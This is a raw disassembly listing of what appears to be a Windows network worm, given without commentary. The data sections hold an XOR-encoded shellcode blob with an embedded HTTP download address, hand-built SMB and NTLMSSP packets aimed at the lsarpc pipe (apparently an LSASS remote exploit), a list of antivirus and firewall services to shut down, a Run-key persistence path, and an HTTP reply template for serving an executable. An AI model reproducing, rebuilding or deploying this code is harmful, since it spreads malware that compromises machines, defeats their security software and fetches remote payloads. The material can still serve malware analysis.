; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440649 proc near ; CODE XREF: .data:0043F268�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_440705
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_44067D
push 22h
mov eax, edi
inc eax
push eax
call sub_440975
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_440698
mov edi, eax
inc edi
jmp short loc_440675
; ---------------------------------------------------------------------------
loc_440674: ; CODE XREF: sub_440649+2F�j
inc edi
loc_440675: ; CODE XREF: sub_440649+29�j
cmp byte ptr [edi], 20h
jz short loc_440674
jmp short loc_440698
; ---------------------------------------------------------------------------
loc_44067C: ; CODE XREF: sub_440649+3E�j
inc edi
loc_44067D: ; CODE XREF: sub_440649+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_440689
cmp eax, 20h
jnz short loc_44067C
loc_440689: ; CODE XREF: sub_440649+39�j
jmp short loc_44068C
; ---------------------------------------------------------------------------
loc_44068B: ; CODE XREF: sub_440649+4D�j
inc edi
loc_44068C: ; CODE XREF: sub_440649:loc_440689�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_440698
cmp eax, 20h
jz short loc_44068B
loc_440698: ; CODE XREF: sub_440649+24�j
; sub_440649+31�j ...
push 0
call sub_440729
push 1
push edi
push 0
push eax
call sub_440441
pop edi
leave
retn
sub_440649 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4406AD proc near ; CODE XREF: sub_43F771+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_4406AE: ; CODE XREF: sub_4406AD+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_4406AE
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_4406AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_4406CD proc near ; CODE XREF: sub_440441+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_4406CD endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406F9 proc near ; CODE XREF: .data:0043F588�p
jmp dword ptr ds:loc_4052A6+2
sub_4406F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440705 proc near ; CODE XREF: sub_440649+5�p
jmp dword ptr ds:loc_4052AB+1
sub_440705 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440711 proc near ; CODE XREF: sub_440441+91�p
jmp dword ptr ds:loc_4052B0
sub_440711 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44071D proc near ; CODE XREF: .data:0043F590�p
jmp dword ptr ds:loc_4052B3+1
sub_44071D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440729 proc near ; CODE XREF: sub_440649+51�p
jmp dword ptr ds:loc_4052B8
sub_440729 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440735 proc near ; CODE XREF: .data:0043F5C0�p
; .data:0043F664�p ...
jmp dword ptr ds:loc_4052BA+2
sub_440735 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440741 proc near ; CODE XREF: .data:0043FE18�p
jmp dword ptr ds:loc_4052C0
sub_440741 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44074D proc near ; CODE XREF: sub_4400CC+4�p
jmp dword ptr ds:loc_4052C4
sub_44074D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440759 proc near ; CODE XREF: sub_43F320+1E�p
jmp dword ptr ds:loc_4052C8
sub_440759 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440765 proc near ; CODE XREF: .data:0043F55E�p
; .data:0044040E�p
jmp dword ptr ds:loc_4052C8+4
sub_440765 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440771 proc near ; CODE XREF: .data:0043F502�p
jmp dword ptr ds:loc_4052CD+3
sub_440771 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44077D proc near ; CODE XREF: .data:0043F59D�p
; .data:0043FE30�p
jmp dword ptr ds:loc_4052D4
sub_44077D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440789 proc near ; CODE XREF: .data:0043F57A�p
jmp dword ptr ds:loc_4052D6+2
sub_440789 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440795 proc near ; CODE XREF: .data:0043F5BA�p
jmp dword ptr ds:loc_4052D9+3
sub_440795 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407A1 proc near ; CODE XREF: sub_43F063+13�p
jmp dword ptr ds:loc_4052DE+2
sub_4407A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407AD proc near ; CODE XREF: .data:0043F5D8�p
; sub_43F771+17E�p
jmp dword ptr ds:loc_4052E3+1
sub_4407AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407B9 proc near ; CODE XREF: .data:0043F4F6�p
; .data:0043F530�p ...
jmp dword ptr ds:loc_4052E8
sub_4407B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407C5 proc near ; CODE XREF: sub_43F771+72�p
jmp dword ptr ds:loc_4052E8+4
sub_4407C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407D1 proc near ; CODE XREF: sub_43F771+BB�p
; sub_43F771+D9�p ...
jmp dword ptr ds:loc_4052F0
sub_4407D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407DD proc near ; CODE XREF: .data:0043F65E�p
; .data:00440126�p ...
jmp dword ptr ds:loc_4052F0+4
sub_4407DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407E9 proc near ; CODE XREF: sub_440172+185�p
jmp dword ptr ds:loc_4052F6+2
sub_4407E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407F5 proc near ; CODE XREF: sub_440441+108�p
jmp dword ptr ds:loc_405301+3
sub_4407F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440801 proc near ; CODE XREF: sub_440441+60�p
jmp dword ptr ds:loc_405307+1
sub_440801 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44080D proc near ; CODE XREF: sub_440441+12B�p
jmp dword ptr ds:loc_40530B+1
sub_44080D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440819 proc near ; CODE XREF: sub_440441+113�p
jmp dword ptr ds:loc_40530F+1
sub_440819 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440825 proc near ; CODE XREF: sub_440441+11C�p
jmp dword ptr ds:loc_405312+2
sub_440825 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440831 proc near ; CODE XREF: .data:00440417�p
jmp dword ptr ds:loc_405318
sub_440831 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44083D proc near ; CODE XREF: sub_440441+87�p
jmp dword ptr ds:loc_40531C
sub_44083D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440849 proc near ; CODE XREF: .data:00440424�p
jmp dword ptr ds:loc_405320
sub_440849 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440855 proc near ; CODE XREF: .data:00440437�p
jmp dword ptr ds:loc_405322+2
sub_440855 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440861 proc near ; CODE XREF: sub_440172+C5�p
; sub_440172+205�p
jmp dword ptr ds:loc_40532E+2
sub_440861 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44086D proc near ; CODE XREF: sub_440172+6F�p
; sub_440172+82�p
jmp dword ptr ds:loc_40532E+6
sub_44086D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440879 proc near ; CODE XREF: sub_440172+BF�p
jmp dword ptr ds:loc_405336+2
sub_440879 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440885 proc near ; CODE XREF: sub_440172+2C�p
jmp dword ptr ds:loc_40533B+1
sub_440885 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440891 proc near ; CODE XREF: sub_440172+59�p
jmp dword ptr ds:loc_40533E+2
sub_440891 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44089D proc near ; CODE XREF: sub_440172+1F5�p
jmp dword ptr ds:loc_40533E+6
sub_44089D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408A9 proc near ; CODE XREF: sub_43F345+21�p
jmp dword ptr ds:loc_405347+1
sub_4408A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408B5 proc near ; CODE XREF: sub_43F345+4B�p
; sub_43F3B0+40�p ...
jmp dword ptr ds:loc_405349+3
sub_4408B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408C1 proc near ; CODE XREF: sub_43F3B0+16�p
; sub_440172+1D1�p
jmp dword ptr ds:loc_405350
sub_4408C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408CD proc near ; CODE XREF: sub_43F3B0+36�p
jmp dword ptr ds:loc_405350+4
sub_4408CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408D9 proc near ; CODE XREF: sub_43F345+41�p
jmp dword ptr ds:loc_405357+1
sub_4408D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408E5 proc near ; CODE XREF: sub_43F285+15�p
jmp dword ptr ds:loc_405364
sub_4408E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408F1 proc near ; CODE XREF: .data:0043F24B�p
jmp dword ptr ds:loc_405364+4
sub_4408F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4408FD proc near ; CODE XREF: .data:0043FE5A�p
; .data:0043FE94�p ...
jmp dword ptr ds:loc_40536B+1
sub_4408FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440909 proc near ; CODE XREF: .data:0043F276�p
jmp dword ptr ds:loc_405370
sub_440909 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440915 proc near ; CODE XREF: sub_43F771+B2�p
; sub_43F771+D0�p ...
jmp dword ptr ds:loc_405372+2
sub_440915 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440921 proc near ; CODE XREF: sub_43F771+16D�p
; sub_43F771+2E4�p ...
jmp dword ptr ds:loc_405372+6
sub_440921 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44092D proc near ; CODE XREF: .data:0043F1CC�p
jmp dword ptr ds:loc_40537A+2
sub_44092D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440939 proc near ; CODE XREF: sub_43F670:loc_43F699�p
; sub_43F670:loc_43F6F3�p ...
jmp dword ptr ds:loc_405380
sub_440939 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440945 proc near ; CODE XREF: .data:0043F185�p
; .data:0043F19F�p ...
jmp dword ptr ds:loc_405382+2
sub_440945 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440951 proc near ; CODE XREF: .data:0043F48B�p
; sub_43F670+F4�p ...
jmp dword ptr ds:loc_405386+2
sub_440951 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44095D proc near ; CODE XREF: .data:0043FE1E�p
jmp dword ptr ds:loc_40538B+1
sub_44095D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440969 proc near ; CODE XREF: sub_43F285+6B�p
; sub_43F285+8E�p ...
jmp dword ptr ds:loc_405390
sub_440969 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440975 proc near ; CODE XREF: sub_440649+17�p
jmp dword ptr ds:loc_405392+2
sub_440975 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440981 proc near ; CODE XREF: .data:0043F43C�p
; .data:0043F458�p
jmp dword ptr ds:loc_405392+6
sub_440981 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h, 17h dup(0)
dd 40300000h, 40311000h, 800000h, 22h dup(0)
dd 5000h, 0
dd 34303400h, 746F4E20h, 756F6620h, 2900646Eh, 0D960413Ah
dd 170A0705h, 27251F1Bh, 2AC9C5ACh, 0DF7F5F3Ch, 746845EBh
dd 2F3A7074h, 3732312Fh, 2 dup(3030302Eh), 3130302Eh, 3030303Ah
dd 662F3038h, 0AEAE6273h, 335DAE62h, 0A0B966C9h, 5758D01h
dd 68AFE8Bh, 575993Ch, 2C068A46h, 99344630h, 0E2470788h
dd 0E80AEBEDh, 0FFFFFFDAh, 99999999h, 41E41499h, 0C9994671h
dd 0C999C999h, 712FE414h, 99C9994Eh, 0F3C999C9h, 0C999F19Dh
dd 99C99989h, 0C999F1C9h, 999CC999h, 0C999F3C9h, 99988B71h
dd 67C999C9h, 10F0E3F3h, 9998931Ch, 0F3C999C9h, 414C999h
dd 0C999989Bh, 71CAC999h, 99C99963h, 0BC999C9h, 10A7C196h
dd 0C999671Ch, 0C999C999h, 9666611Ah, 0C999091Dh, 0C999C999h
dd 0C8C850B2h, 1498F3C8h, 71C941DCh, 99C99936h, 4EC999C9h
dd 1291C0A4h, 0ED599249h, 0C959B2EFh, 14C9C9C9h, 0CBCA2FC4h
dd 0C9990C71h, 0C999C999h, 21E424FFh, 0C7ED5992h, 99F1CDCDh
dd 9CC999C9h, 2C66C999h, 0C9999893h, 71C9C999h, 99C999E3h
dd 0FBC999C9h, 6683B8B0h, 9998932Ch, 66C999C9h, 0C999672Ch
dd 0C999C999h, 0C9991471h, 0C999C999h, 0E7C29C9Bh, 99672C66h
dd 99C999C9h, 99E771C9h, 99C999C9h, 31F1AC9h, 149CF3A4h
dd 99989B04h, 0CAC999C9h, 0C999F571h, 0C999C999h, 7126F434h
dd 71C998F3h, 99C999F9h, 77C999C9h, 14865973h, 496624D4h
dd 0C999CB71h, 0C999C999h, 0EF133BF9h, 0A13729F9h, 0DE9AED9Eh
dd 9E5F6072h, 5AF8C999h, 0C999A9C1h, 2 dup(0C999C999h)
dd 0B7FBEAFFh, 99FCE1FCh, 4 dup(99C999C9h), 0F934C7C9h
dd 25B459AAh, 0C9662A2Ah, 819093ACh, 909CC9B7h, 0C983639Dh
dd 999271CDh, 99C999C9h, 3519BFC9h, 0BDFD1451h, 91720A95h
dd 71F934C7h, 99C999C8h, 12C999C9h, 0D512A5D2h, 529AE180h
dd 8D146FAAh, 0B9C89A2Ah, 4A9A8B12h, 595859AAh, 0DB9BAB9Eh
dd 0C999A319h, 0DDA26CECh, 9EED85BDh, 81E8A2DFh, 125544EBh
dd 4A9ABDC8h, 0EB8D2E96h, 9A85D812h, 99D125Ah, 0DD105A9Ah
dd 10F885BDh, 9998971Ch, 66C999C9h, 0FD7F6649h, 0A98712FEh
dd 0C212C999h, 85C21295h, 0C2128212h, 0FDC65A91h, 0C6EAFAh
dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
dd 0FEFF0000h, 0
dd 2006200h, 4E204350h, 4F575445h, 50204B52h, 52474F52h
dd 31204D41h, 200302Eh, 4D4E414Ch, 2E314E41h, 57020030h
dd 6F646E69h, 66207377h, 5720726Fh, 676B726Fh, 70756F72h
dd 2E332073h, 2006131h, 2E314D4Ch, 30305832h, 4C020032h
dd 414D4E41h, 312E324Eh, 544E0200h, 204D4C20h, 32312E30h
dd 0
dd 53FFA400h, 73424Dh, 18000000h, 0C807h, 3 dup(0)
dd 0FEFFh, 0FF0C0010h, 400A400h, 0A11h, 0
dd 2000h, 0D4000000h, 69800000h, 4C544E00h, 5053534Dh
dd 100h, 8829700h, 0E0h, 3 dup(0)
dd 570000h, 6E0069h, 6F0064h, 730077h, 320020h, 300030h
dd 200030h, 310032h, 350039h, 570000h, 6E0069h, 6F0064h
dd 730077h, 320020h, 300030h, 200030h, 2E0035h, 30h, 0
dd 0FFDA0000h, 73424D53h, 0
dd 0C80718h, 3 dup(0)
dd 0FEFF00h, 0C002008h, 0DA00FFh, 0A1104h, 0
dd 570000h, 0
dd 800000D4h, 544E009Fh, 53534D4Ch, 30050h, 10000h, 460001h
dd 0
dd 470000h, 0
dd 400000h, 0
dd 400000h, 60000h, 400006h, 100000h, 470010h, 8A150000h
dd 48E088h, 44004Fh, 6A198100h, 49E4F27Ah, 30AF281Ch, 67107425h
dd 69005753h, 64006E00h, 77006F00h, 20007300h, 30003200h
dd 30003000h, 32002000h, 39003100h, 3500h, 69005700h, 64006E00h
dd 77006F00h, 20007300h, 30003200h, 30003000h, 35002000h
dd 30002E00h, 2 dup(0)
dd 53FF5C00h, 75424Dh, 18000000h, 0C807h, 3 dup(0)
dd 800FEFFh, 0FF040030h, 8005C00h, 31000100h, 5C0000h
dd 31005Ch, 320039h, 31002Eh, 380036h, 31002Eh, 32002Eh
dd 300031h, 49005Ch, 430050h, 24h, 3F3F3F3Fh, 3Fh, 0FF640000h
dd 0A2424D53h, 0
dd 0C80718h, 3 dup(0)
dd 4DC08h, 18004008h, 0DEDE00FFh, 16000E00h, 0
dd 9F000000h, 201h, 2 dup(0)
dd 3000000h, 1000000h, 40000000h, 2000000h, 3000000h, 5C000011h
dd 73006C00h, 72006100h, 63007000h, 0
dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0C000000h
dd 4D53FFF4h, 2542h, 7180000h, 0C8h, 2 dup(0)
dd 0DC080000h, 60080004h, 1000h, 0CA0h, 400h, 2 dup(0)
dd 540000h, 540CA0h, 260002h, 0CB14000h, 50005C10h, 50004900h
dd 5C004500h, 0
dd 500h, 1003h, 0CA000h, 100h, 0C8800h, 9000000h, 3EC00h
dd 0
dd 3EC00h, 14950000h, 30040h, 707C0000h, 10040h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 707C0000h, 10040h, 0
dd 10000h, 0
dd 85780000h, 5BAB0013h, 0E9A6h, 0FFF81000h, 2F424D53h
dd 0
dd 0C80718h, 3 dup(0)
dd 0FEFF08h, 0E006008h, 0DEDE00FFh, 4000h, 0FFFF0000h
dd 8FFFFh, 10B8h, 4010B8h, 0
dd 5EE10B9h, 10010000h, 0B8000000h, 1000010h, 0C000000h
dd 20h, 0AD000900h, 0Dh, 0AD000000h, 0Dh, 0D80F0000h, 424D53FFh
dd 25h, 0C8071800h, 3 dup(0)
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 0
dd 40A89A00h, 100h, 0
dd 100h, 10h dup(0)
dd 460000h, 101h, 0Dh dup(0)
dd 15123C00h, 275h, 0Dh dup(0)
dd 1C123C00h, 75h, 0Eh dup(0)
dd 0EC816600h, 0E4FF071Ch, 100h, 404CF700h, 404CE900h
dd 200h, 180h, 404CF700h, 404CE000h, 100h, 180h, 404CF700h
dd 404CCF00h, 200h, 80h, 0
dd 404CB500h, 0
dd 404C9C00h, 2 dup(0)
dd 404C8C00h, 2 dup(0)
dd 404C8200h, 2 dup(0)
dd 404C6900h, 2 dup(0)
dd 404C5000h, 2 dup(0)
dd 404C4300h, 2 dup(0)
dd 404C3300h, 100h, 0
dd 404C2C00h, 100h, 4049F800h, 404C2400h, 100h, 0
dd 404C1900h, 2 dup(0)
dd 404C1200h, 100h, 0
dd 404C0C00h, 100h, 0
dd 404C0300h, 100h, 0
dd 404BFC00h, 100h, 0
dd 404BF300h, 100h, 0
dd 404BEC00h, 100h, 0
dd 404BE500h, 100h, 0
dd 404BDD00h, 100h, 0
dd 404BD700h, 100h, 404A0800h, 404BD000h, 100h, 0
dd 404BC800h, 100h, 0
dd 404BC100h, 100h, 0
dd 404BBB00h, 100h, 0
dd 404BB200h, 100h, 404A1800h, 404BAD00h, 100h, 0
dd 404BA800h, 100h, 404A2800h, 404BA200h, 100h, 0
dd 524F5700h, 6669004Dh, 6F530063h, 61777466h, 4D5C6572h
dd 6F726369h, 74666F73h, 6E69575Ch, 73776F64h, 6B005C00h
dd 6469706Ch, 706C6B00h, 6C6B0066h, 76006669h, 74616473h
dd 746E61h, 6F6D7376h, 6D6B006Eh, 78627378h, 786D6B00h
dd 7369646Eh, 786D6B00h, 736469h, 66786D6Bh, 6D6B0077h
dd 6C696678h, 6D6B0065h, 67666378h, 786D6B00h, 676962h
dd 61786D6Bh, 746E6567h, 786D5500h, 676643h, 41786D55h
dd 746E6567h, 786D5500h, 5500554Ch, 6F50786Dh, 6D53006Ch
dd 72655363h, 65636976h, 69667300h, 7265746Ch, 736E6C00h
dd 317766h, 7074754Fh, 4674736Fh, 77657269h, 6C6C61h, 72616873h
dd 63616465h, 73736563h, 41634D00h, 20656566h, 6D617246h
dd 726F7765h, 6553206Bh, 63697672h, 65440065h, 74636574h
dd 6420726Fh, 664F2065h, 65636966h, 6E616353h, 5A00544Eh
dd 41656E6Fh, 6D72616Ch, 6E615000h, 41206164h, 7669746Eh
dd 73757269h, 726F4E00h, 206E6F74h, 69746E41h, 75726976h
dd 65532073h, 63697672h, 614B0065h, 72657073h, 20796B73h
dd 69746E41h, 6361482Dh, 2E72656Bh, 6B6E6Ch, 656E6F5Ah
dd 62614C20h, 6C432073h, 746E6569h, 6F4D4100h, 6F74696Eh
dd 6F4C0072h, 27206B6Fh, 5320276Eh, 706F74h, 54464F53h
dd 45524157h, 63694D5Ch, 6F736F72h, 575C7466h, 6F646E69h
dd 435C7377h, 65727275h, 6556746Eh, 6F697372h, 75525C6Eh
dd 78006Eh, 253A7325h, 31002F75h, 312E3239h, 252E3836h
dd 75252E75h, 32373100h, 2E75252Eh, 252E7525h, 30310075h
dd 2E75252Eh, 252E7525h, 6EB0075h, 5C0006EBh, 5C73255Ch
dd 24637069h, 2E752500h, 252E7525h, 75252E75h, 54544800h
dd 2E312F50h, 30322031h, 4B4F2030h, 0A0D0A0Dh, 43000A0Dh
dd 65746E6Fh, 4C2D746Eh, 74676E65h, 25203A68h, 0D0A0D75h
dd 5448000Ah, 312F5054h, 3220312Eh, 4F203030h, 430A0D4Bh
dd 65746E6Fh, 542D746Eh, 3A657079h, 70706120h, 6163696Ch
dd 6E6F6974h, 652D782Fh, 632D6578h, 72706D6Fh, 65737365h
dd 0A0D64h, 787878h, 544547h, 300050h, 6 dup(0)
dd 50F400h, 2 dup(0)
dd 57F400h, 524C00h, 513800h, 2 dup(0)
dd 583C00h, 529000h, 514400h, 2 dup(0)
dd 584C00h, 529C00h, 515000h, 2 dup(0)
dd 585C00h, 52A800h, 51AC00h, 2 dup(0)
dd 58C000h, 530400h, 51D800h, 2 dup(0)
dd 58F000h, 533000h, 520C00h, 2 dup(0)
dd 592C00h, 536400h, 1Ah dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 2 dup(0)
dd 53A000h, 53B000h, 53BC00h, 53C400h, 53D400h, 53E000h
dd 53F000h, 540000h, 540800h, 541400h, 542000h, 542C00h
dd 543400h, 543C00h, 544800h, 2 dup(0)
dd 545400h, 2 dup(0)
dd 547000h, 2 dup(0)
dd 548C00h, 549C00h, 54B000h, 54C800h, 54D800h, 54EC00h
dd 54FC00h, 550C00h, 551C00h, 553000h, 554800h, 556000h
dd 557000h, 558000h, 558C00h, 559800h, 55A800h, 55B000h
dd 55BC00h, 55C800h, 55D800h, 2 dup(0)
dd 55E800h, 55F400h, 560800h, 561800h, 562C00h, 564000h
dd 565400h, 566800h, 567800h, 2 dup(0)
dd 568C00h, 56A400h, 56B800h, 56C800h, 56DC00h, 56EC00h
dd 570000h, 571400h, 572400h, 573400h, 574800h, 2 dup(0)
dd 575C00h, 576400h, 577400h, 578000h, 578800h, 579400h
dd 57A000h, 57A800h, 57B000h, 57BC00h, 57C800h, 57D000h
dd 57DC00h, 57E800h, 0
dd 57003000h, 74534153h, 75747261h, 70h, 61003500h, 70656363h
dd 74h, 62003600h, 646E69h, 63003700h, 65736F6Ch, 6B636F73h
